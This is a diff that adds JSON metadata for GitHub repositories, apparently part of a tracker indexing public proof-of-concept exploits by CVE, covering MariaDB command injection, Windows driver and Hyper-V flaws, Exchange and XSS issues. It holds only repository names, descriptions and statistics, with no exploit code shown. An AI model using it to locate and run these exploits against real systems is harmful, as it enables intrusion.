--- /dev/null
+++ b/2021/CVE-2021-27928.json
@@ -0,0 +1,109 @@
+[
+ {
+ "id": 358154501,
+ "name": "CVE-2021-27928",
+ "full_name": "Al1ex\/CVE-2021-27928",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-27928",
+ "description": "CVE-2021-27928 MariaDB\/MySQL-'wsrep provider' 命令注入漏洞",
+ "fork": false,
+ "created_at": "2021-04-15T06:40:49Z",
+ "updated_at": "2024-04-23T17:52:08Z",
+ "pushed_at": "2023-06-29T15:57:12Z",
+ "stargazers_count": 59,
+ "watchers_count": 59,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-27928",
+ "mariadb"
+ ],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 59,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436588547,
+ "name": "CVE-2021-27928-POC",
+ "full_name": "shamo0\/CVE-2021-27928-POC",
+ "owner": {
+ "login": "shamo0",
+ "id": 48299520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4",
+ "html_url": "https:\/\/github.com\/shamo0"
+ },
+ "html_url": "https:\/\/github.com\/shamo0\/CVE-2021-27928-POC",
+ "description": "CVE-2021-27928-POC",
+ "fork": false,
+ "created_at": "2021-12-09T11:18:26Z",
+ "updated_at": "2023-03-10T12:11:13Z",
+ "pushed_at": "2021-12-09T12:05:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2021",
+ "27928",
+ "cve",
+ "escalation",
+ "mariadb",
+ "mysql",
+ "privilege",
+ "provider",
+ "root",
+ "shell",
+ "sql",
+ "wsrep"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 578286043,
+ "name": "CVE-2021-27928",
+ "full_name": "LalieA\/CVE-2021-27928",
+ "owner": {
+ "login": "LalieA",
+ "id": 83229713,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83229713?v=4",
+ "html_url": "https:\/\/github.com\/LalieA"
+ },
+ "html_url": "https:\/\/github.com\/LalieA\/CVE-2021-27928",
+ "description": "A Proof of Concept for the CVE-2021-27928 flaw exploitation",
+ "fork": false,
+ "created_at": "2022-12-14T17:36:38Z",
+ "updated_at": "2023-09-10T22:57:40Z",
+ "pushed_at": "2023-09-10T22:57:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27963.json b/2021/CVE-2021-27963.json
new file mode 100644
index 0000000000..0194604c32
--- /dev/null
+++ b/2021/CVE-2021-27963.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 342558842,
+ "name": "SonLogger-vulns",
+ "full_name": "erberkan\/SonLogger-vulns",
+ "owner": {
+ "login": "erberkan",
+ "id": 15521812,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15521812?v=4",
+ "html_url": "https:\/\/github.com\/erberkan"
+ },
+ "html_url": "https:\/\/github.com\/erberkan\/SonLogger-vulns",
+ "description": "SonLogger Vulns (CVE-2021-27963, CVE-2021-27964)",
+ "fork": false,
+ "created_at": "2021-02-26T11:44:04Z",
+ "updated_at": "2023-11-05T18:22:50Z",
+ "pushed_at": "2021-03-13T08:39:31Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-27965.json b/2021/CVE-2021-27965.json
new file mode 100644
index 0000000000..cb5c0b7368
--- /dev/null
+++ b/2021/CVE-2021-27965.json
@@ -0,0 +1,107 @@
+[
+ {
+ "id": 373502325,
+ "name": "CVE-2021-27965",
+ "full_name": "mathisvickie\/CVE-2021-27965",
+ "owner": {
+ "login": "mathisvickie",
+ "id": 60326914,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60326914?v=4",
+ "html_url": "https:\/\/github.com\/mathisvickie"
+ },
+ "html_url": "https:\/\/github.com\/mathisvickie\/CVE-2021-27965",
+ "description": "stack based buffer overflow in MsIo64.sys, Proof of Concept Local Privilege Escalation to nt authority\/system",
+ "fork": false,
+ "created_at": "2021-06-03T12:39:11Z",
+ "updated_at": "2024-02-24T11:42:32Z",
+ "pushed_at": "2021-06-07T13:46:21Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "buffer-overflow",
+ "cve",
+ "cve-2021-27965",
+ "driver",
+ "exploit",
+ "kernel",
+ "kernel-driver",
+ "local-privilege-escalation",
+ "msio64",
+ "poc",
+ "privilege-escalation",
+ "proof-of-concept",
+ "stack-buffer-overflow",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423304617,
+ "name": "CVE-2021-27965",
+ "full_name": "Jeromeyoung\/CVE-2021-27965",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-27965",
+ "description": "Proof of concept for CVE-2021-27965 (Stack-based Buffer Overflow)",
+ "fork": false,
+ "created_at": "2021-11-01T01:41:37Z",
+ "updated_at": "2021-11-01T01:41:37Z",
+ "pushed_at": "2021-10-31T02:39:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 512356900,
+ "name": "CVE-2021-27965",
+ "full_name": "fengjixuchui\/CVE-2021-27965",
+ "owner": {
+ "login": "fengjixuchui",
+ "id": 2487206,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4",
+ "html_url": "https:\/\/github.com\/fengjixuchui"
+ },
+ "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2021-27965",
+ "description": "The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request.",
+ "fork": false,
+ "created_at": "2022-07-10T05:53:36Z",
+ "updated_at": "2023-07-14T15:06:01Z",
+ "pushed_at": "2022-07-10T04:23:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28079.json b/2021/CVE-2021-28079.json
new file mode 100644
index 0000000000..5453e97fb7
--- /dev/null
+++ b/2021/CVE-2021-28079.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 423093176,
+ "name": "CVE-2021-28079",
+ "full_name": "g33xter\/CVE-2021-28079",
+ "owner": {
+ "login": "g33xter",
+ "id": 8503135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8503135?v=4",
+ "html_url": "https:\/\/github.com\/g33xter"
+ },
+ "html_url": "https:\/\/github.com\/g33xter\/CVE-2021-28079",
+ "description": "POC Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.",
+ "fork": false,
+ "created_at": "2021-10-31T08:29:53Z",
+ "updated_at": "2022-07-01T15:45:14Z",
+ "pushed_at": "2021-10-31T08:57:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-28079",
+ "electronjs",
+ "jamovi",
+ "omv",
+ "xss-exploitation"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28164.json b/2021/CVE-2021-28164.json
new file mode 100644
index 0000000000..634fa9916a
--- /dev/null
+++ b/2021/CVE-2021-28164.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 712483356,
+ "name": "-jettyCVE-2021-28164-",
+ "full_name": "jammy0903\/-jettyCVE-2021-28164-",
+ "owner": {
+ "login": "jammy0903",
+ "id": 144465258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144465258?v=4",
+ "html_url": "https:\/\/github.com\/jammy0903"
+ },
+ "html_url": "https:\/\/github.com\/jammy0903\/-jettyCVE-2021-28164-",
+ "description": "jetty \/CVE-2021-28164\/분석 및 결과",
+ "fork": false,
+ "created_at": "2023-10-31T14:59:29Z",
+ "updated_at": "2023-10-31T14:59:30Z",
+ "pushed_at": "2023-10-31T16:01:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28165.json b/2021/CVE-2021-28165.json
new file mode 100644
index 0000000000..56144f9fcd
--- /dev/null
+++ b/2021/CVE-2021-28165.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 713358479,
+ "name": "CVE-2021-28165",
+ "full_name": "uthrasri\/CVE-2021-28165",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2021-28165",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-02T11:08:06Z",
+ "updated_at": "2023-11-02T11:10:22Z",
+ "pushed_at": "2023-11-02T19:13:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 719443987,
+ "name": "Jetty_v9.4.31_CVE-2021-28165",
+ "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2021-28165",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2021-28165",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-16T07:15:37Z",
+ "updated_at": "2023-11-16T07:19:45Z",
+ "pushed_at": "2023-11-16T07:38:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28310.json b/2021/CVE-2021-28310.json
new file mode 100644
index 0000000000..9ccbeaff38
--- /dev/null
+++ b/2021/CVE-2021-28310.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 357800087,
+ "name": "IOC_for_CVE-2021-28310",
+ "full_name": "Rafael-Svechinskaya\/IOC_for_CVE-2021-28310",
+ "owner": {
+ "login": "Rafael-Svechinskaya",
+ "id": 82496408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82496408?v=4",
+ "html_url": "https:\/\/github.com\/Rafael-Svechinskaya"
+ },
+ "html_url": "https:\/\/github.com\/Rafael-Svechinskaya\/IOC_for_CVE-2021-28310",
+ "description": "Malicious Payloads that abuses Win32k Elevation of Privilege Vulnerability (CVE-2021-28310)",
+ "fork": false,
+ "created_at": "2021-04-14T06:36:40Z",
+ "updated_at": "2022-10-15T14:05:58Z",
+ "pushed_at": "2021-04-14T07:16:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28312.json b/2021/CVE-2021-28312.json
new file mode 100644
index 0000000000..e699f5e131
--- /dev/null
+++ b/2021/CVE-2021-28312.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 365343703,
+ "name": "CVE-2021-28312",
+ "full_name": "shubham0d\/CVE-2021-28312",
+ "owner": {
+ "login": "shubham0d",
+ "id": 12750163,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4",
+ "html_url": "https:\/\/github.com\/shubham0d"
+ },
+ "html_url": "https:\/\/github.com\/shubham0d\/CVE-2021-28312",
+ "description": "POC and description for CVE-2021-28312",
+ "fork": false,
+ "created_at": "2021-05-07T20:16:22Z",
+ "updated_at": "2023-12-23T19:23:53Z",
+ "pushed_at": "2021-05-07T20:31:12Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28378.json b/2021/CVE-2021-28378.json
new file mode 100644
index 0000000000..c5d7d0426f
--- /dev/null
+++ b/2021/CVE-2021-28378.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 391631988,
+ "name": "CVE-2021-28378",
+ "full_name": "pandatix\/CVE-2021-28378",
+ "owner": {
+ "login": "pandatix",
+ "id": 57038071,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57038071?v=4",
+ "html_url": "https:\/\/github.com\/pandatix"
+ },
+ "html_url": "https:\/\/github.com\/pandatix\/CVE-2021-28378",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-01T13:16:53Z",
+ "updated_at": "2022-02-28T14:22:43Z",
+ "pushed_at": "2021-08-07T14:28:09Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28476.json b/2021/CVE-2021-28476.json
new file mode 100644
index 0000000000..46b48a8dfc
--- /dev/null
+++ b/2021/CVE-2021-28476.json
@@ -0,0 +1,190 @@
+[
+ {
+ "id": 372590733,
+ "name": "CVE-2021-28476",
+ "full_name": "0vercl0k\/CVE-2021-28476",
+ "owner": {
+ "login": "0vercl0k",
+ "id": 1476421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4",
+ "html_url": "https:\/\/github.com\/0vercl0k"
+ },
+ "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-28476",
+ "description": "PoC for CVE-2021-28476 a guest-to-host \"Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.",
+ "fork": false,
+ "created_at": "2021-05-31T18:02:39Z",
+ "updated_at": "2024-06-20T06:28:21Z",
+ "pushed_at": "2021-06-01T15:08:23Z",
+ "stargazers_count": 212,
+ "watchers_count": 212,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-28476",
+ "guest-to-host",
+ "hyper-v",
+ "network-service-provider",
+ "nvsp",
+ "rndis",
+ "vmswitch"
+ ],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 212,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 373204692,
+ "name": "CVE-2021-28476",
+ "full_name": "bluefrostsecurity\/CVE-2021-28476",
+ "owner": {
+ "login": "bluefrostsecurity",
+ "id": 4976074,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4976074?v=4",
+ "html_url": "https:\/\/github.com\/bluefrostsecurity"
+ },
+ "html_url": "https:\/\/github.com\/bluefrostsecurity\/CVE-2021-28476",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-02T14:50:56Z",
+ "updated_at": "2024-04-02T17:49:39Z",
+ "pushed_at": "2021-06-02T14:54:14Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 396338187,
+ "name": "CVE-2021-28476-tools-env",
+ "full_name": "LaCeeKa\/CVE-2021-28476-tools-env",
+ "owner": {
+ "login": "LaCeeKa",
+ "id": 88970302,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88970302?v=4",
+ "html_url": "https:\/\/github.com\/LaCeeKa"
+ },
+ "html_url": "https:\/\/github.com\/LaCeeKa\/CVE-2021-28476-tools-env",
+ "description": "tools for automate configure Ubuntu 20.04 enviroment for testing CVE-2021-28476.",
+ "fork": false,
+ "created_at": "2021-08-15T12:06:44Z",
+ "updated_at": "2021-10-04T16:45:05Z",
+ "pushed_at": "2021-08-15T11:44:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 448441625,
+ "name": "CVE-2021-28476",
+ "full_name": "australeo\/CVE-2021-28476",
+ "owner": {
+ "login": "australeo",
+ "id": 47684814,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47684814?v=4",
+ "html_url": "https:\/\/github.com\/australeo"
+ },
+ "html_url": "https:\/\/github.com\/australeo\/CVE-2021-28476",
+ "description": "CVE-2021-28476: Hyper-V vmswitch.sys arbitrary pointer dereference from guest VM",
+ "fork": false,
+ "created_at": "2022-01-16T02:45:26Z",
+ "updated_at": "2023-01-20T10:49:14Z",
+ "pushed_at": "2022-01-16T02:46:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 471563181,
+ "name": "0vercl0k",
+ "full_name": "2273852279qqs\/0vercl0k",
+ "owner": {
+ "login": "2273852279qqs",
+ "id": 101910961,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101910961?v=4",
+ "html_url": "https:\/\/github.com\/2273852279qqs"
+ },
+ "html_url": "https:\/\/github.com\/2273852279qqs\/0vercl0k",
+ "description": "PoC for CVE-2021-28476 a guest-to-host \"Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.",
+ "fork": false,
+ "created_at": "2022-03-19T01:33:04Z",
+ "updated_at": "2022-03-19T01:33:04Z",
+ "pushed_at": "2022-03-19T01:33:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482583152,
+ "name": "0vercl0k",
+ "full_name": "dengyang123x\/0vercl0k",
+ "owner": {
+ "login": "dengyang123x",
+ "id": 103896519,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103896519?v=4",
+ "html_url": "https:\/\/github.com\/dengyang123x"
+ },
+ "html_url": "https:\/\/github.com\/dengyang123x\/0vercl0k",
+ "description": "PoC for CVE-2021-28476 a guest-to-host \"Hyper-V Remote Code Execution Vulnerability\" in vmswitch.sys.",
+ "fork": false,
+ "created_at": "2022-04-17T17:00:49Z",
+ "updated_at": "2022-05-31T07:42:57Z",
+ "pushed_at": "2022-04-17T17:00:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28480.json b/2021/CVE-2021-28480.json
new file mode 100644
index 0000000000..096c75c0ee
--- /dev/null
+++ b/2021/CVE-2021-28480.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 360116407,
+ "name": "CVE-2021-28480_HoneyPoC3",
+ "full_name": "ZephrFish\/CVE-2021-28480_HoneyPoC3",
+ "owner": {
+ "login": "ZephrFish",
+ "id": 5783068,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4",
+ "html_url": "https:\/\/github.com\/ZephrFish"
+ },
+ "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2021-28480_HoneyPoC3",
+ "description": "DO NOT RUN THIS.",
+ "fork": false,
+ "created_at": "2021-04-21T09:50:39Z",
+ "updated_at": "2023-09-28T11:27:01Z",
+ "pushed_at": "2021-07-15T01:41:13Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 475777282,
+ "name": "CVE-2021-28480",
+ "full_name": "Threonic\/CVE-2021-28480",
+ "owner": {
+ "login": "Threonic",
+ "id": 49891027,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49891027?v=4",
+ "html_url": "https:\/\/github.com\/Threonic"
+ },
+ "html_url": "https:\/\/github.com\/Threonic\/CVE-2021-28480",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-30T07:57:43Z",
+ "updated_at": "2022-03-30T07:57:43Z",
+ "pushed_at": "2022-03-30T07:57:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28482.json b/2021/CVE-2021-28482.json
new file mode 100644
index 0000000000..225fc60fef
--- /dev/null
+++ b/2021/CVE-2021-28482.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 363946586,
+ "name": "CVE-2021-28482-Exchange-POC",
+ "full_name": "Shadow0ps\/CVE-2021-28482-Exchange-POC",
+ "owner": {
+ "login": "Shadow0ps",
+ "id": 6516174,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516174?v=4",
+ "html_url": "https:\/\/github.com\/Shadow0ps"
+ },
+ "html_url": "https:\/\/github.com\/Shadow0ps\/CVE-2021-28482-Exchange-POC",
+ "description": "POC from TestANull for CVE-2021-28482 on Exchange Server",
+ "fork": false,
+ "created_at": "2021-05-03T13:54:36Z",
+ "updated_at": "2023-12-20T06:22:34Z",
+ "pushed_at": "2021-05-03T14:29:49Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 369452613,
+ "name": "CVE-2021-28482_Exploit",
+ "full_name": "KevinWorst\/CVE-2021-28482_Exploit",
+ "owner": {
+ "login": "KevinWorst",
+ "id": 84563225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84563225?v=4",
+ "html_url": "https:\/\/github.com\/KevinWorst"
+ },
+ "html_url": "https:\/\/github.com\/KevinWorst\/CVE-2021-28482_Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-21T07:34:46Z",
+ "updated_at": "2021-06-30T06:41:38Z",
+ "pushed_at": "2021-05-22T00:19:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444979391,
+ "name": "testanull-CVE-2021-28482.py",
+ "full_name": "timb-machine-mirrors\/testanull-CVE-2021-28482.py",
+ "owner": {
+ "login": "timb-machine-mirrors",
+ "id": 49810875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4",
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors"
+ },
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors\/testanull-CVE-2021-28482.py",
+ "description": "Clone from gist",
+ "fork": false,
+ "created_at": "2022-01-05T23:26:58Z",
+ "updated_at": "2023-04-08T20:15:02Z",
+ "pushed_at": "2022-01-05T23:27:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28663.json b/2021/CVE-2021-28663.json
new file mode 100644
index 0000000000..de28b60c47
--- /dev/null
+++ b/2021/CVE-2021-28663.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 402225063,
+ "name": "CVE-2021-28663",
+ "full_name": "lntrx\/CVE-2021-28663",
+ "owner": {
+ "login": "lntrx",
+ "id": 37024183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37024183?v=4",
+ "html_url": "https:\/\/github.com\/lntrx"
+ },
+ "html_url": "https:\/\/github.com\/lntrx\/CVE-2021-28663",
+ "description": "A basic PoC leak for CVE-2021-28663 (Internal of the Android kernel backdoor vulnerability)",
+ "fork": false,
+ "created_at": "2021-09-01T22:59:29Z",
+ "updated_at": "2024-05-19T14:55:58Z",
+ "pushed_at": "2021-09-03T10:24:34Z",
+ "stargazers_count": 114,
+ "watchers_count": 114,
+ "has_discussions": false,
+ "forks_count": 26,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 26,
+ "watchers": 114,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-28750.json b/2021/CVE-2021-28750.json
new file mode 100644
index 0000000000..92b78fac2f
--- /dev/null
+++ b/2021/CVE-2021-28750.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 444335154,
+ "name": "CVE-2021-28750-site",
+ "full_name": "PfalzPrince\/CVE-2021-28750-site",
+ "owner": {
+ "login": "PfalzPrince",
+ "id": 96906354,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96906354?v=4",
+ "html_url": "https:\/\/github.com\/PfalzPrince"
+ },
+ "html_url": "https:\/\/github.com\/PfalzPrince\/CVE-2021-28750-site",
+ "description": "PoC Site for tsunami-security-scanner-plugins. ",
+ "fork": false,
+ "created_at": "2022-01-04T08:05:03Z",
+ "updated_at": "2022-01-04T09:01:44Z",
